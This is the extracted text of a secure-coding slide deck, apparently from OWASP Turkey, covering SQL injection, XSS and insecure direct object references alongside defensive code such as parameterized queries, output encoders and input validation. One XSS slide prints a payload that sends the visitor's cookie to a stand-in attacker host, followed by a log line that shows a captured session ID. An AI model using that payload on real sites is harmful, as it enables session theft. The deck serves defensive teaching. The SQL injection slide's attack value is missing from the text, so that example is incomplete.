SecureYourApp

OWASP-Turkey

Bünyamin Demir

Bünyamin Demir ( @bunyamindemir )– Lisans Kocaeli Üni. Matematik Bölümü– Yüksek Lisans Kocaeli Üni Fen-Bilimleri, Tez; Oracle Veritabanı

Güvenliği– Uygulama Geliştirici – OWASP Türkiye Bölüm Lideri– Sızma Testleri Uzmanı

• Web, Mobil, Network, SCADA, Wireless, Sosyal Mühendislik, ATM, DoS/DDoS ve Yük testi

• Kaynak kod analizi

– Eğitmen• Web/Mobil Uygulama Güvenlik Denetimi• Güvenli Kod Geliştirme• Veritabanı Güvenliği

2

3

OWASP

4

Why is OWASP Special?

• OWASP Top 10

• OWASP Zed Attack Proxy (ZAP)

• OpenSAMM

• Cheat Sheets

• ESAPI

• ASVS

• Testing Guide

• Development Guide5

OWASP Projects

6

OWASP ZAP Proxy / WebScarab

7

Application Security Verification Standart

Application Security

8

Two weeks of ethical hacking

Ten man-years of development

Business Logic Flaws

Code Flaws

Security Errors

Attacker vs. Defender

9

Web Application Threat Surface

10

11

OWASP TOP 10

A1 - Injection

12

Anatomy of SQL Injection Attack

13

sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”) & “’ AND password = ‘” & Request(“password”) & ”’”

What the developer intended:

username = john

password = password

SQL Query:

SELECT * FROM user_table WHERE username = ‘john’ AND password = ‘password’

Anatomy of SQL Injection Attack

14

sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”) & “ ’ AND password = ‘ ” & Request(“password”) & “ ’ ”

(This is DYNAMIC SQL and Untrusted Input)

What the developer did not intend is parameter values like:

username = john

password =

SQL Query:

SELECT * FROM user_table WHERE username = ‘john’ AND password =

causes all rows in the users table to be returned!

Bind Parameters (PHP)

15

$stmt = $dbh->prepare(”update users set

email=:new_email where id=:user_id”);

$stmt->bindParam(':new_email', $email);

$stmt->bindParam(':user_id', $id);

Parametrized Query (.NET)

16

SqlConnection objConnection = new

SqlConnection(_ConnectionString);

objConnection.Open();

SqlCommand objCommand = new SqlCommand(

"SELECT * FROM User WHERE Name = @Name

AND Password = @Password", objConnection);

objCommand.Parameters.Add("@Name",

NameTextBox.Text);

objCommand.Parameters.Add("@Password",

PassTextBox.Text);

SqlDataReader objReader =

objCommand.ExecuteReader();

Prepare Statement (Java)

17

String newName = request.getParameter("newName") ;

String id = request.getParameter("id");

//SQL

PreparedStatement pstmt = con.prepareStatement("UPDATE

EMPLOYEES SET NAME = ? WHERE ID = ?");

pstmt.setString(1, newName);

pstmt.setString(2, id);

//HQL

Query safeHQLQuery = session.createQuery("from

Employees where id=:empId");

safeHQLQuery.setParameter("empId", id);

A3 - XSS

18

A3 - XSS

19

Anatomy of XSS Attack

20

http://www.davshan.loc/friends.php?search=<abc>

<p>Result for <b><abc></b> :0<p><br />

http://www.davshan.loc/friends.php?search=<script>alert(1);</script>

Anatomy of XSS Attack

21

<script>document.write("<img src='http://www.evil.com?"+document.cookie+"'>")</script>

187.4.1.32 - - [28/Feb/2012:00:38:32 +0200] "GET /?PHPSESSID=ulc1141mm2tehjhfdqh1ktfas5 HTTP/1.1" 200 7425 "http://www.davshan.loc/....

OWASP Java Encoder Project

22

<%-- Basic HTML Context --%>

<body><b><%= Encode.forHtml(UNTRUSTED) %>" /></b></body>

<%-- HTML Attribute Context --%>

<input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" />

<%-- Javascript Block context --%>

<script type="text/javascript">

var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>"; alert(msg);

</script>

<%-- Javascript Variable context --%>

<button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED) %>');">click me</button>

Rich Text

23

OWASP HTML Sanitizer Project

24

PolicyFactory policy = new HtmlPolicyBuilder()

.allowElements("a")

.allowUrlProtocols("https")

.allowAttributes("href").onElements("a")

.requireRelNofollowOnLinks()

.build();

String safeHTML = policy.sanitize(untrustedHTML);

JQuery.Encoder

25

…

$(function() {

$(".div [name="+$.encoder.encodeForHTML($.encoder.canonicalize(window.location.hash.substr(1)+"]"));

});

…

encodeForHTMLAttribute, encodeForJavascript, encodeForURL, encodeForCSS

$('#profile_link').html('<a href="/profile/' + $.encoder.encodeForURL(userID) + '">Link</a>');

A4 – Insecure Direct Object References

26

• Attacker notices his acct parameter is 6065

?acct=6065

• He modifies it to a nearby number

?acct=6066

• Attacker views the victim’s account information

https://www.onlinebank.com/user?acct=6065

Best way to SecureYourApp

27

Input Validation

Input Validation - Java

28

public boolean validateUsername(String username) {

String usernamePattern = "^[a-zA-Z0-9]{6,12}$";

if (username == null) {

return false;

}

Pattern p = Pattern.compile(usernamePattern);

Matcher m = p.matcher(username);

if (!m.matches()) {

return false;

}

return true;

}

if (!validateUsername(username)) {

//invalid username

}

Input Validation - .NET

29

if (!Regex.IsMatch(TxtSinifAdi.Text, @"^[a-zA-Z0-9.\s]{1,10}$"))

{

// sinif ismi uygun değildir

}

30